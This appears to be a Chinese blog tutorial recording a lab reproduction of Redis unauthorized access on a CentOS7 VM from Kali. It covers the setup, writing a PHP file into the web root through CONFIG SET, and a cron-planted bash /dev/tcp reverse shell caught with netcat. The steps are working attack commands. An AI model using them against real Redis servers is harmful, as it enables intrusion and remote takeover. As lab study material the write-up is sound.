一:搭建环境卸载重装几次,翻看几十篇文章最后复现成功,因此记录一下
环境VMware,两台主机使用NAT模式连接
Kali | 192.168.209.129 |
---|---|
CentOS7 | 192.168.209.128 |
二:CentOS搭建redis,以root权限开启虚机
(1).下载安装包
wget http://download.redis.io/releases/redis-4.0.6.tar.gz
解压
tar -zxvf redis-4.0.6.tar.gz
(2).redis 是用 C 语言开发,安装之前必先安装 gcc 环境
yum install -y gcc
(3).切换到redis下载目录,执行编译
cd /usr/local/redis-4.0.6/ 目录看自己解压位置
make 编译redis
(4).复制redis配置文件到etc文件夹下面
cp /usr/local/redis-4.0.6/redis.conf /etc
(5).切换目录到etc,编辑redis.conf文件
vi redis.conf
此处,不要去除#,意思是可以允许任意ip外连
关闭保护模式
redis默认端口6379不动
(6).启动redis服务
/usr/local/redis-4.0.6/src/redis-server /etc/redis.conf
成功如下图所示:
三:Kali操作
(1).尝试连接
redis-cli -h 192.168.209.128 -p 6379 无密码连接目标主机
如果没有redis-cli,需要安装
(2).可以输入些命令看看基本信息
info查看基本信息
keys* 查看键,发现是空的
四:使用redis进行攻击,这篇文章很详细但是也有问题,下面叙述
参考链接:h ttps://blog.csdn.net/qq_41210745/article/details/103309137
(1)使用redis写webshell
config set dir /var/www/html 设置redis 的备份文件存放目录为 /var/www/html
config set dbfilename test.php 设置一个备份名为test.php的文件且放到存放目录
set x "\r\n\r\n<?php phpinfo();?>\r\n\r\n",因为redis会自带乱七八糟的东西,如果不换行转义,phpinfo是读不出来
save 一次备份操作
redis是一个key-value型数据库,信息以键对应值的关系存储在内存。
如果按照以上的操作,上传其实是成功,在靶机可以看到,但在kali使用firefox打开会发现是无法访问到的,这让人很不舒服,盘它!
链接作者遇到此问题但没有提出解决方法
查找资料后发现靶机缺少web环境,需要安装apache
参考链接: https://blog.csdn.net/xgrx2008/article/details/82715186
1.安装httpd
yum install httpd* -y
2.启动httpd服务
systemctl start httpd.service 开启服务
systemctl status httpd.service 查看状态
3.经过这一系类操作,你会发现,wc真的可以访问成功了?当然没有,新的问题又来了,apache访问test.php没有转到页面而是直接下载php文件
4.为了解决这一问题,找到下面这篇文章,修改配置得以成功,得到了phpinfo页面,webshell执行成功
参考链接: https://www.cnblogs.com/peng-lan/p/11361758.html
(2)使用nc反弹端口成功getshell
1.set xx "\n* * * * * bash -i >& /dev/tcp/192.168.209.129/9999 0>&1\n"
bash -i意为创建一个交互式的bash shell
/dev/tcp读写这个文件就相当于在socket连接中传输数据
这条命令我的理解是利用bash 去与攻击机产生交互
2.config set dbfilename root 写入名为root的文件
3.config set dir /var/spool/cron
/var/spool/scon是linux默认的计划任务,Linux会定期去执行
save
再开一个窗口,nc监听,成功getshell
nc -lvnp 9999
五:总结
redis未授权耗时三个下午才完成,配置文件并不多难,但是安装一个全新虚拟机所欠缺的环境太多,各种奇怪的问题接踵而来,实在有些无奈。
以上命令不一定适合所有人,如有欠缺与错误之处,欢迎指正,毕竟我只是个菜鸟。
首发于2021-07-30 15:17